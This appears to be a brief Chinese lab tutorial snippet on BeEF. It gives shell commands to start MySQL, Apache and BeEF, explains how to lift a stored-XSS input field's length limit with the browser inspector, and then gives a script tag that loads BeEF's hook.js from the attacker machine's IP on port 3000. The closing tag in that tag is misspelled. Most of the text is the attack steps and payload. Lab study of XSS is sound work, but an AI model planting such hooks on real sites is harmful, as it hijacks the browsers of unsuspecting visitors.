赞
踩
service mysql start #开启mysql服务
service apache2 start #开启Apache2服务
cd /usr/share/beef-xss/
./beef #打开BeEF
然后进入存储型XSS中,使用浏览器自带的元素检查进行修改XSS输入框的限制(可以修改成宽度60,最大4行,最多可输入500字)
将以下代码复制到XSS输入框中,并点击上传
<script src="http://攻击机IP:3000/hook.js"></scriipt>
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。